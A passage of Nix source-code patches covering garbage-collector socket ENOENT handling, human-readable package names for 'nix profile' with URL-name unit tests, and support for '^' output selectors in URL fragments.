From c5fdbdae321903740e0e735aa89fab5647992687 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 19 Jun 2023 16:54:05 +0200 Subject: [PATCH 001/654] LocalStore::addTempRoot(): Handle ENOENT If the garbage collector has acquired the global GC lock, but hasn't created the GC socket yet, then a client attempting to connect would get ENOENT. Note that this only happens when the GC runs for the first time on a machine. Subsequently clients will get ECONNREFUSED which was already handled. Fixes #7370. --- src/libstore/gc.cc | 13 +++++++++---- tests/gc-non-blocking.sh | 7 ++++++- 2 files changed, 15 insertions(+), 5 deletions(-) diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index 0038ec802..b5b9e2049 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -138,9 +138,9 @@ void LocalStore::addTempRoot(const StorePath & path) try { nix::connect(fdRootsSocket->get(), socketPath); } catch (SysError & e) { - /* The garbage collector may have exited, so we need to - restart. */ - if (e.errNo == ECONNREFUSED) { + /* The garbage collector may have exited or not + created the socket yet, so we need to restart. */ + if (e.errNo == ECONNREFUSED || e.errNo == ENOENT) { debug("GC socket connection refused"); fdRootsSocket->close(); goto restart; @@ -503,6 +503,11 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) auto fdGCLock = openGCLock(); FdLock gcLock(fdGCLock.get(), ltWrite, true, "waiting for the big garbage collector lock..."); + /* Synchronisation point to test ENOENT handling in + addTempRoot(), see tests/gc-non-blocking.sh. */ + if (auto p = getEnv("_NIX_TEST_GC_SYNC_2")) + readFile(*p); + /* Start the server for receiving new roots. */ auto socketPath = stateDir.get() + gcSocketPath; createDirs(dirOf(socketPath)); @@ -772,7 +777,7 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) } }; - /* Synchronisation point for testing, see tests/gc-concurrent.sh. */ + /* Synchronisation point for testing, see tests/gc-non-blocking.sh. */ if (auto p = getEnv("_NIX_TEST_GC_SYNC")) readFile(*p); diff --git a/tests/gc-non-blocking.sh b/tests/gc-non-blocking.sh index 0d781485d..da6dbdf5d 100644 --- a/tests/gc-non-blocking.sh +++ b/tests/gc-non-blocking.sh @@ -9,16 +9,21 @@ clearStore fifo=$TEST_ROOT/test.fifo mkfifo "$fifo" +fifo2=$TEST_ROOT/test2.fifo +mkfifo "$fifo2" + dummy=$(nix store add-path ./simple.nix) running=$TEST_ROOT/running touch $running -(_NIX_TEST_GC_SYNC=$fifo nix-store --gc -vvvvv; rm $running) & +(_NIX_TEST_GC_SYNC=$fifo _NIX_TEST_GC_SYNC_2=$fifo2 nix-store --gc -vvvvv; rm $running) & pid=$! sleep 2 +(sleep 1; echo > $fifo2) & + outPath=$(nix-build --max-silent-time 60 -o "$TEST_ROOT/result" -E " with import ./config.nix; mkDerivation { From 3859b425975d0347e724b6abb513662667b3e8c7 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 21 Jun 2023 16:17:21 +0200 Subject: [PATCH 002/654] Wait for pid --- tests/gc-non-blocking.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tests/gc-non-blocking.sh b/tests/gc-non-blocking.sh index da6dbdf5d..7f2aebb8b 100644 --- a/tests/gc-non-blocking.sh +++ b/tests/gc-non-blocking.sh @@ -23,6 +23,7 @@ pid=$! sleep 2 (sleep 1; echo > $fifo2) & +pid2=$! outPath=$(nix-build --max-silent-time 60 -o "$TEST_ROOT/result" -E " with import ./config.nix; @@ -32,6 +33,7 @@ outPath=$(nix-build --max-silent-time 60 -o "$TEST_ROOT/result" -E " }") wait $pid +wait $pid2 (! test -e $running) (! test -e $dummy) From 257b768436a0e8ab7887f9b790c5b92a7fe51ef5 Mon Sep 17 00:00:00 2001 From: Felix Uhl Date: Sun, 9 Jul 2023 22:16:21 +0200 Subject: [PATCH 003/654] Enable using human-readable name in nix profile --- doc/manual/src/release-notes/rl-next.md | 2 + src/libutil/tests/url-name.cc | 64 ++++++++++ src/libutil/url-name.cc | 46 +++++++ src/libutil/url-name.hh | 20 +++ src/nix/profile-list.md | 10 +- src/nix/profile-remove.md | 15 +-- src/nix/profile-upgrade.md | 10 +- src/nix/profile.cc | 160 ++++++++++++++++-------- tests/functional/nix-profile.sh | 21 ++-- 9 files changed, 274 insertions(+), 74 deletions(-) create mode 100644 src/libutil/tests/url-name.cc create mode 100644 src/libutil/url-name.cc create mode 100644 src/libutil/url-name.hh diff --git a/doc/manual/src/release-notes/rl-next.md b/doc/manual/src/release-notes/rl-next.md index 85e180e37..d50da32cd 100644 --- a/doc/manual/src/release-notes/rl-next.md +++ b/doc/manual/src/release-notes/rl-next.md @@ -64,3 +64,5 @@ ``` This makes it match `nix derivation show`, which also maps store paths to information. + +- [`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Indices are deprecated and will be removed in a future version. diff --git a/src/libutil/tests/url-name.cc b/src/libutil/tests/url-name.cc new file mode 100644 index 000000000..6ee66e826 --- /dev/null +++ b/src/libutil/tests/url-name.cc @@ -0,0 +1,64 @@ +#include "url-name.hh" +#include + +namespace nix { + +/* ----------- tests for url-name.hh --------------------------------------------------*/ + + TEST(getNameFromURL, getsNameFromURL) { + ASSERT_EQ(getNameFromURL(parseURL("path:/home/user/project")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("path:.#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); + ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); + + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nix#packages.x86_64-linux.default")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nix#")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nix")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("github:cachix/devenv/main#packages.x86_64-linux.default")), "devenv"); + ASSERT_EQ(getNameFromURL(parseURL("github:edolstra/nix-warez?rev=1234&dir=blender&ref=master")), "blender"); + + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nixpkgs#hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nix#packages.x86_64-linux.default")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nix#")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:NixOS/nix")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("gitlab:cachix/devenv/main#packages.x86_64-linux.default")), "devenv"); + + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nixpkgs#hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nix#packages.x86_64-linux.default")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nix#")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:NixOS/nix")), "nix"); + ASSERT_EQ(getNameFromURL(parseURL("sourcehut:cachix/devenv/main#packages.x86_64-linux.default")), "devenv"); + + ASSERT_EQ(getNameFromURL(parseURL("git://github.com/edolstra/dwarffs")), "dwarffs"); + ASSERT_EQ(getNameFromURL(parseURL("git://github.com/edolstra/nix-warez?dir=blender")), "blender"); + ASSERT_EQ(getNameFromURL(parseURL("git+file:///home/user/project")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("git+file:///home/user/project?ref=fa1e2d23a22")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("git+ssh://git@github.com/someuser/my-repo#")), "my-repo"); + ASSERT_EQ(getNameFromURL(parseURL("git+git://github.com/someuser/my-repo?rev=v1.2.3")), "my-repo"); + ASSERT_EQ(getNameFromURL(parseURL("git+ssh:///home/user/project?dir=subproject&rev=v2.4")), "subproject"); + ASSERT_EQ(getNameFromURL(parseURL("git+http://not-even-real#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("git+https://not-even-real#packages.aarch64-darwin.hello")), "hello"); + + ASSERT_EQ(getNameFromURL(parseURL("tarball+http://github.com/NixOS/nix/archive/refs/tags/2.18.1#packages.x86_64-linux.jq")), "jq"); + ASSERT_EQ(getNameFromURL(parseURL("tarball+https://github.com/NixOS/nix/archive/refs/tags/2.18.1#packages.x86_64-linux.hg")), "hg"); + ASSERT_EQ(getNameFromURL(parseURL("tarball+file:///home/user/Downloads/nixpkgs-2.18.1#packages.aarch64-darwin.ripgrep")), "ripgrep"); + + ASSERT_EQ(getNameFromURL(parseURL("https://github.com/NixOS/nix/archive/refs/tags/2.18.1.tar.gz#packages.x86_64-linux.pv")), "pv"); + ASSERT_EQ(getNameFromURL(parseURL("http://github.com/NixOS/nix/archive/refs/tags/2.18.1.tar.gz#packages.x86_64-linux.pv")), "pv"); + + ASSERT_EQ(getNameFromURL(parseURL("file:///home/user/project?ref=fa1e2d23a22")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("file+file:///home/user/project?ref=fa1e2d23a22")), "project"); + ASSERT_EQ(getNameFromURL(parseURL("file+http://not-even-real#packages.x86_64-linux.hello")), "hello"); + ASSERT_EQ(getNameFromURL(parseURL("file+http://gitfantasy.com/org/user/notaflake")), "notaflake"); + ASSERT_EQ(getNameFromURL(parseURL("file+https://not-even-real#packages.aarch64-darwin.hello")), "hello"); + + ASSERT_EQ(getNameFromURL(parseURL("https://www.github.com/")), std::nullopt); + ASSERT_EQ(getNameFromURL(parseURL("path:.")), std::nullopt); + ASSERT_EQ(getNameFromURL(parseURL("file:.#")), std::nullopt); + ASSERT_EQ(getNameFromURL(parseURL("path:.#packages.x86_64-linux.default")), std::nullopt); + } +} diff --git a/src/libutil/url-name.cc b/src/libutil/url-name.cc new file mode 100644 index 000000000..ab65e78df --- /dev/null +++ b/src/libutil/url-name.cc @@ -0,0 +1,46 @@ +#include "url-name.hh" +#include +#include + +namespace nix { + +static const std::string attributeNamePattern("[a-z0-9_-]+"); +static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")"); +static const std::string pathSegmentPattern("[a-zA-Z0-9_-]+"); +static const std::regex lastPathSegmentRegex(".*/(" + pathSegmentPattern +")"); +static const std::regex secondPathSegmentRegex("(?:" + pathSegmentPattern + ")/(" + pathSegmentPattern +")(?:/.*)?"); +static const std::regex gitProviderRegex("github|gitlab|sourcehut"); +static const std::regex gitSchemeRegex("git($|\\+.*)"); + +std::optional getNameFromURL(ParsedURL url) { + std::smatch match; + + /* If there is a dir= argument, use its value */ + if (url.query.count("dir") > 0) + return url.query.at("dir"); + + /* If the fragment isn't a "default" and contains two attribute elements, use the last one */ + if (std::regex_match(url.fragment, match, lastAttributeRegex)) + return match.str(1); + + /* If this is a github/gitlab/sourcehut flake, use the repo name */ + if (std::regex_match(url.scheme, gitProviderRegex) && std::regex_match(url.path, match, secondPathSegmentRegex)) + return match.str(1); + + /* If it is a regular git flake, use the directory name */ + if (std::regex_match(url.scheme, gitSchemeRegex) && std::regex_match(url.path, match, lastPathSegmentRegex)) + return match.str(1); + + /* If everything failed but there is a non-default fragment, use it in full */ + if (!url.fragment.empty() && !hasSuffix(url.fragment, "default")) + return url.fragment; + + /* If there is no fragment, take the last element of the path */ + if (std::regex_match(url.path, match, lastPathSegmentRegex)) + return match.str(1); + + /* If even that didn't work, the URL does not contain enough info to determine a useful name */ + return {}; +} + +} diff --git a/src/libutil/url-name.hh b/src/libutil/url-name.hh new file mode 100644 index 000000000..188b951e5 --- /dev/null +++ b/src/libutil/url-name.hh @@ -0,0 +1,20 @@ +#include "url.hh" +#include "url-parts.hh" +#include "util.hh" +#include "split.hh" + +namespace nix { + +/** + * Try to extract a reasonably unique and meaningful, human-readable + * name of a flake output from a parsed URL. + * When nullopt is returned, the callsite should use information available + * to it outside of the URL to determine a useful name. + * This is a heuristic approach intended for user interfaces. + * @return nullopt if the extracted name is not useful to identify a + * flake output, for example because it is empty or "default". + * Otherwise returns the extracted name. + */ +std::optional getNameFromURL(ParsedURL url); + +} diff --git a/src/nix/profile-list.md b/src/nix/profile-list.md index 5d7fcc0ec..facfdf0d6 100644 --- a/src/nix/profile-list.md +++ b/src/nix/profile-list.md @@ -6,12 +6,14 @@ R""( ```console # nix profile list + Name: gdb Index: 0 Flake attribute: legacyPackages.x86_64-linux.gdb Original flake URL: flake:nixpkgs Locked flake URL: github:NixOS/nixpkgs/7b38b03d76ab71bdc8dc325e3f6338d984cc35ca Store paths: /nix/store/indzcw5wvlhx6vwk7k4iq29q15chvr3d-gdb-11.1 + Name: blender-bin Index: 1 Flake attribute: packages.x86_64-linux.default Original flake URL: flake:blender-bin @@ -26,7 +28,7 @@ R""( # nix build github:edolstra/nix-warez/91f2ffee657bf834e4475865ae336e2379282d34?dir=blender#packages.x86_64-linux.default ``` - will build the package with index 1 shown above. + will build the package `blender-bin` shown above. # Description @@ -34,10 +36,14 @@ This command shows what packages are currently installed in a profile. For each installed package, it shows the following information: -* `Index`: An integer that can be used to unambiguously identify the +* `Name`: A unique name used to unambiguously identify the package in invocations of `nix profile remove` and `nix profile upgrade`. +* `Index`: An integer that can be used to unambiguously identify the + package in invocations of `nix profile remove` and `nix profile upgrade`. + (*Deprecated, will be removed in a future version in favor of `Name`.*) + * `Flake attribute`: The flake output attribute path that provides the package (e.g. `packages.x86_64-linux.hello`). diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md index ba85441d8..c994b79bd 100644 --- a/src/nix/profile-remove.md +++ b/src/nix/profile-remove.md @@ -2,18 +2,19 @@ R""( # Examples -* Remove a package by position: +* Remove a package by name: + + ```console + # nix profile remove hello + ``` + +* Remove a package by index + *(deprecated, will be removed in a future version)*: ```console # nix profile remove 3 ``` -* Remove a package by attribute path: - - ```console - # nix profile remove packages.x86_64-linux.hello - ``` - * Remove all packages: ```console diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md index 39cca428b..47103edfc 100644 --- a/src/nix/profile-upgrade.md +++ b/src/nix/profile-upgrade.md @@ -9,18 +9,16 @@ R""( # nix profile upgrade '.*' ``` -* Upgrade a specific package: +* Upgrade a specific package by name: ```console - # nix profile upgrade packages.x86_64-linux.hello + # nix profile upgrade hello ``` -* Upgrade a specific profile element by number: +* Upgrade a specific package by index + *(deprecated, will be removed in a future version)*: ```console - # nix profile list - 0 flake:nixpkgs#legacyPackages.x86_64-linux.spotify … - # nix profile upgrade 0 ``` diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 476ddcd60..48a481858 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -10,6 +10,8 @@ #include "../nix-env/user-env.hh" #include "profiles.hh" #include "names.hh" +#include "url.hh" +#include "url-name.hh" #include #include @@ -43,6 +45,7 @@ const int defaultPriority = 5; struct ProfileElement { StorePathSet storePaths; + std::string name; std::optional source; bool active = true; int priority = defaultPriority; @@ -116,6 +119,8 @@ struct ProfileManifest if (pathExists(manifestPath)) { auto json = nlohmann::json::parse(readFile(manifestPath)); + /* Keep track of alreay found names to allow preventing duplicates */ + std::set foundNames; auto version = json.value("version", 0); std::string sUrl; @@ -149,6 +154,25 @@ struct ProfileManifest e["outputs"].get() }; } + + std::string nameCandidate = element.identifier(); + if (e.contains("name")) { + nameCandidate = e["name"]; + } + else if (element.source) { + auto url = parseURL(element.source->to_string()); + auto name = getNameFromURL(url); + if (name) + nameCandidate = *name; + } + + auto finalName = nameCandidate; + for (int i = 1; foundNames.contains(finalName); ++i) { + finalName = nameCandidate + std::to_string(i); + } + element.name = finalName; + foundNames.insert(element.name); + elements.emplace_back(std::move(element)); } } @@ -163,6 +187,7 @@ struct ProfileManifest for (auto & drvInfo : drvInfos) { ProfileElement element; element.storePaths = {drvInfo.queryOutPath()}; + element.name = element.identifier(); elements.emplace_back(std::move(element)); } } @@ -451,15 +476,25 @@ public: { std::vector res; + auto anyIndexMatchers = false; + for (auto & s : _matchers) { - if (auto n = string2Int(s)) + if (auto n = string2Int(s)) { res.push_back(*n); + anyIndexMatchers = true; + } else if (store->isStorePath(s)) res.push_back(s); else res.push_back(RegexPattern{s,std::regex(s, std::regex::extended | std::regex::icase)}); } + if (anyIndexMatchers) { + warn("Indices are deprecated and will be removed in a future version!\n" + " Refer to packages by their `Name` as printed by `nix profile list`.\n" + " See https://github.com/NixOS/nix/issues/9171 for more information."); + } + return res; } @@ -471,8 +506,7 @@ public: } else if (auto path = std::get_if(&matcher)) { if (element.storePaths.count(store.parseStorePath(*path))) return true; } else if (auto regex = std::get_if(&matcher)) { - if (element.source - && std::regex_match(element.source->attrPath, regex->reg)) + if (std::regex_match(element.name, regex->reg)) return true; } } @@ -556,62 +590,83 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf Installables installables; std::vector indices; + auto matchedCount = 0; auto upgradedCount = 0; for (size_t i = 0; i < manifest.elements.size(); ++i) { auto & element(manifest.elements[i]); - if (element.source - && !element.source->originalRef.input.isLocked() - && matches(*store, element, i, matchers)) - { - upgradedCount++; - - Activity act(*logger, lvlChatty, actUnknown, - fmt("checking '%s' for updates", element.source->attrPath)); - - auto installable = make_ref( - this, - getEvalState(), - FlakeRef(element.source->originalRef), - "", - element.source->outputs, - Strings{element.source->attrPath}, - Strings{}, - lockFlags); - - auto derivedPaths = installable->toDerivedPaths(); - if (derivedPaths.empty()) continue; - auto * infop = dynamic_cast(&*derivedPaths[0].info); - // `InstallableFlake` should use `ExtraPathInfoFlake`. - assert(infop); - auto & info = *infop; - - if (element.source->lockedRef == info.flake.lockedRef) continue; - - printInfo("upgrading '%s' from flake '%s' to '%s'", - element.source->attrPath, element.source->lockedRef, info.flake.lockedRef); - - element.source = ProfileElementSource { - .originalRef = installable->flakeRef, - .lockedRef = info.flake.lockedRef, - .attrPath = info.value.attrPath, - .outputs = installable->extendedOutputsSpec, - }; - - installables.push_back(installable); - indices.push_back(i); + if (!matches(*store, element, i, matchers)) { + continue; } + + matchedCount++; + + if (!element.source) { + warn( + "Found package '%s', but it was not installed from a flake, so it can't be checked for upgrades!", + element.identifier() + ); + continue; + } + if (element.source->originalRef.input.isLocked()) { + warn( + "Found package '%s', but it was installed from a locked flake reference so it can't be upgraded!", + element.identifier() + ); + continue; + } + + upgradedCount++; + + Activity act(*logger, lvlChatty, actUnknown, + fmt("checking '%s' for updates", element.source->attrPath)); + + auto installable = make_ref( + this, + getEvalState(), + FlakeRef(element.source->originalRef), + "", + element.source->outputs, + Strings{element.source->attrPath}, + Strings{}, + lockFlags); + + auto derivedPaths = installable->toDerivedPaths(); + if (derivedPaths.empty()) continue; + auto * infop = dynamic_cast(&*derivedPaths[0].info); + // `InstallableFlake` should use `ExtraPathInfoFlake`. + assert(infop); + auto & info = *infop; + + if (element.source->lockedRef == info.flake.lockedRef) continue; + + printInfo("upgrading '%s' from flake '%s' to '%s'", + element.source->attrPath, element.source->lockedRef, info.flake.lockedRef); + + element.source = ProfileElementSource { + .originalRef = installable->flakeRef, + .lockedRef = info.flake.lockedRef, + .attrPath = info.value.attrPath, + .outputs = installable->extendedOutputsSpec, + }; + + installables.push_back(installable); + indices.push_back(i); } if (upgradedCount == 0) { - for (auto & matcher : matchers) { - if (const size_t * index = std::get_if(&matcher)){ - warn("'%d' is not a valid index", *index); - } else if (const Path * path = std::get_if(&matcher)){ - warn("'%s' does not match any paths", *path); - } else if (const RegexPattern * regex = std::get_if(&matcher)){ - warn("'%s' does not match any packages", regex->pattern); + if (matchedCount == 0) { + for (auto & matcher : matchers) { + if (const size_t * index = std::get_if(&matcher)){ + warn("'%d' is not a valid index", *index); + } else if (const Path * path = std::get_if(&matcher)){ + warn("'%s' does not match any paths", *path); + } else if (const RegexPattern * regex = std::get_if(&matcher)){ + warn("'%s' does not match any packages", regex->pattern); + } } + } else { + warn("Found some packages but none of them could be upgraded."); } warn ("Use 'nix profile list' to see the current profile."); } @@ -657,9 +712,10 @@ struct CmdProfileList : virtual EvalCommand, virtual StoreCommand, MixDefaultPro for (size_t i = 0; i < manifest.elements.size(); ++i) { auto & element(manifest.elements[i]); if (i) logger->cout(""); - logger->cout("Index: " ANSI_BOLD "%s" ANSI_NORMAL "%s", - i, + logger->cout("Name: " ANSI_BOLD "%s" ANSI_NORMAL "%s", + element.name, element.active ? "" : " " ANSI_RED "(inactive)" ANSI_NORMAL); + logger->cout("Index: %s", i); if (element.source) { logger->cout("Flake attribute: %s%s", element.source->attrPath, element.source->outputs.to_string()); logger->cout("Original flake URL: %s", element.source->originalRef.to_string()); diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 7c478a0cd..1fdbfb644 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -47,7 +47,7 @@ cp ./config.nix $flake1Dir/ # Test upgrading from nix-env. nix-env -f ./user-envs.nix -i foo-1.0 -nix profile list | grep -A2 'Index:.*0' | grep 'Store paths:.*foo-1.0' +nix profile list | grep -A2 'Name:.*foo' | grep 'Store paths:.*foo-1.0' nix profile install $flake1Dir -L nix profile list | grep -A4 'Index:.*1' | grep 'Locked flake URL:.*narHash' [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello World" ]] @@ -81,7 +81,7 @@ nix profile rollback # Test uninstall. [ -e $TEST_HOME/.nix-profile/bin/foo ] -nix profile remove 0 +nix profile remove foo (! [ -e $TEST_HOME/.nix-profile/bin/foo ]) nix profile history | grep 'foo: 1.0 -> ∅' nix profile diff-closures | grep 'Version 3 -> 4' @@ -93,6 +93,13 @@ nix profile remove 1 nix profile install $(nix-build --no-out-link ./simple.nix) [[ $(cat $TEST_HOME/.nix-profile/hello) = "Hello World!" ]] +# Test packages with same name from different sources +mkdir $TEST_ROOT/simple-too +cp ./simple.nix ./config.nix simple.builder.sh $TEST_ROOT/simple-too +nix profile install --file $TEST_ROOT/simple-too/simple.nix '' +nix profile list | grep -A4 'Name:.*simple' | grep 'Name:.*simple1' +nix profile remove simple1 + # Test wipe-history. nix profile wipe-history [[ $(nix profile history | grep Version | wc -l) -eq 1 ]] @@ -104,7 +111,7 @@ nix profile upgrade 0 nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 3.0, 3.0-man" # Test new install of CA package. -nix profile remove 0 +nix profile remove flake1 printf 4.0 > $flake1Dir/version printf Utrecht > $flake1Dir/who nix profile install $flake1Dir @@ -112,26 +119,26 @@ nix profile install $flake1Dir [[ $(nix path-info --json $(realpath $TEST_HOME/.nix-profile/bin/hello) | jq -r .[].ca) =~ fixed:r:sha256: ]] # Override the outputs. -nix profile remove 0 1 +nix profile remove simple flake1 nix profile install "$flake1Dir^*" [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello Utrecht" ]] [ -e $TEST_HOME/.nix-profile/share/man ] [ -e $TEST_HOME/.nix-profile/include ] printf Nix > $flake1Dir/who -nix profile upgrade 0 +nix profile upgrade flake1 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello Nix" ]] [ -e $TEST_HOME/.nix-profile/share/man ] [ -e $TEST_HOME/.nix-profile/include ] -nix profile remove 0 +nix profile remove flake1 nix profile install "$flake1Dir^man" (! [ -e $TEST_HOME/.nix-profile/bin/hello ]) [ -e $TEST_HOME/.nix-profile/share/man ] (! [ -e $TEST_HOME/.nix-profile/include ]) # test priority -nix profile remove 0 +nix profile remove flake1 # Make another flake. flake2Dir=$TEST_ROOT/flake2 From 9c0a09f09fbb930483b26f60f8552fbe5236b777 Mon Sep 17 00:00:00 2001 From: Bob van der Linden Date: Sun, 1 Oct 2023 22:09:55 +0200 Subject: [PATCH 004/654] allow ^ in URLs Users may select specific outputs using the ^output syntax or selecting any output using ^*. URL parsing currently doesn't support these kinds of output references: parsing will fail. Currently `queryRegex` was reused for URL fragments, which didn't include support for ^. Now queryRegex has been split from fragmentRegex, where only the fragmentRegex supports ^. --- src/libexpr/flake/flakeref.cc | 2 +- src/libutil/tests/url-name.cc | 3 +++ src/libutil/url-name.cc | 5 +++-- src/libutil/url-parts.hh | 1 + src/libutil/url.cc | 2 +- tests/functional/nix-profile.sh | 1 + 6 files changed, 10 insertions(+), 4 deletions(-) diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc index 16f45ace7..49d6940b1 100644 --- a/src/libexpr/flake/flakeref.cc +++ b/src/libexpr/flake/flakeref.cc @@ -190,7 +190,7 @@ std::optional> parseFlakeIdRef( static std::regex flakeRegex( "((" + flakeIdRegexS + ")(?:/(?:" + refAndOrRevRegex + "))?)" - + "(?:#(" + queryRegex + "))?", + + "(?:#(" + fragmentRegex + "))?", std::regex::ECMAScript); if (std::regex_match(url, match, flakeRegex)) { diff --git a/src/libutil/tests/url-name.cc b/src/libutil/tests/url-name.cc index 6ee66e826..f637efa89 100644 --- a/src/libutil/tests/url-name.cc +++ b/src/libutil/tests/url-name.cc @@ -10,6 +10,8 @@ namespace nix { ASSERT_EQ(getNameFromURL(parseURL("path:~/repos/nixpkgs#packages.x86_64-linux.hello")), "hello"); ASSERT_EQ(getNameFromURL(parseURL("path:.#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "nonStandardAttr.mylaptop"); + ASSERT_EQ(getNameFromURL(parseURL("path:./nixpkgs#packages.x86_64-linux.complex^bin,man")), "complex"); + ASSERT_EQ(getNameFromURL(parseURL("path:./myproj#packages.x86_64-linux.default^*")), "myproj"); ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello"); ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#hello")), "hello"); @@ -60,5 +62,6 @@ namespace nix { ASSERT_EQ(getNameFromURL(parseURL("path:.")), std::nullopt); ASSERT_EQ(getNameFromURL(parseURL("file:.#")), std::nullopt); ASSERT_EQ(getNameFromURL(parseURL("path:.#packages.x86_64-linux.default")), std::nullopt); + ASSERT_EQ(getNameFromURL(parseURL("path:.#packages.x86_64-linux.default^*")), std::nullopt); } } diff --git a/src/libutil/url-name.cc b/src/libutil/url-name.cc index ab65e78df..f94383e32 100644 --- a/src/libutil/url-name.cc +++ b/src/libutil/url-name.cc @@ -5,12 +5,13 @@ namespace nix { static const std::string attributeNamePattern("[a-z0-9_-]+"); -static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")"); +static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")(\\^.*)?"); static const std::string pathSegmentPattern("[a-zA-Z0-9_-]+"); static const std::regex lastPathSegmentRegex(".*/(" + pathSegmentPattern +")"); static const std::regex secondPathSegmentRegex("(?:" + pathSegmentPattern + ")/(" + pathSegmentPattern +")(?:/.*)?"); static const std::regex gitProviderRegex("github|gitlab|sourcehut"); static const std::regex gitSchemeRegex("git($|\\+.*)"); +static const std::regex defaultOutputRegex(".*\\.default($|\\^.*)"); std::optional getNameFromURL(ParsedURL url) { std::smatch match; @@ -32,7 +33,7 @@ std::optional getNameFromURL(ParsedURL url) { return match.str(1); /* If everything failed but there is a non-default fragment, use it in full */ - if (!url.fragment.empty() && !hasSuffix(url.fragment, "default")) + if (!url.fragment.empty() && !std::regex_match(url.fragment, defaultOutputRegex)) return url.fragment; /* If there is no fragment, take the last element of the path */ diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index 5c5a30dc2..59c17df34 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -19,6 +19,7 @@ const static std::string userRegex = "(?:(?:" + unreservedRegex + "|" + pctEncod const static std::string authorityRegex = "(?:" + userRegex + "@)?" + hostRegex + "(?::[0-9]+)?"; const static std::string pcharRegex = "(?:" + unreservedRegex + "|" + pctEncoded + "|" + subdelimsRegex + "|[:@])"; const static std::string queryRegex = "(?:" + pcharRegex + "|[/? \"])*"; +const static std::string fragmentRegex = "(?:" + pcharRegex + "|[/? \"^])*"; const static std::string segmentRegex = "(?:" + pcharRegex + "*)"; const static std::string absPathRegex = "(?:(?:/" + segmentRegex + ")*/?)"; const static std::string pathRegex = "(?:" + segmentRegex + "(?:/" + segmentRegex + ")*/?)"; diff --git a/src/libutil/url.cc b/src/libutil/url.cc index 9b438e6cd..2a0a5c839 100644 --- a/src/libutil/url.cc +++ b/src/libutil/url.cc @@ -15,7 +15,7 @@ ParsedURL parseURL(const std::string & url) "((" + schemeRegex + "):" + "(?:(?://(" + authorityRegex + ")(" + absPathRegex + "))|(/?" + pathRegex + ")))" + "(?:\\?(" + queryRegex + "))?" - + "(?:#(" + queryRegex + "))?", + + "(?:#(" + fragmentRegex + "))?", std::regex::ECMAScript); std::smatch match; diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 1fdbfb644..eced4d3f1 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -126,6 +126,7 @@ nix profile install "$flake1Dir^*" [ -e 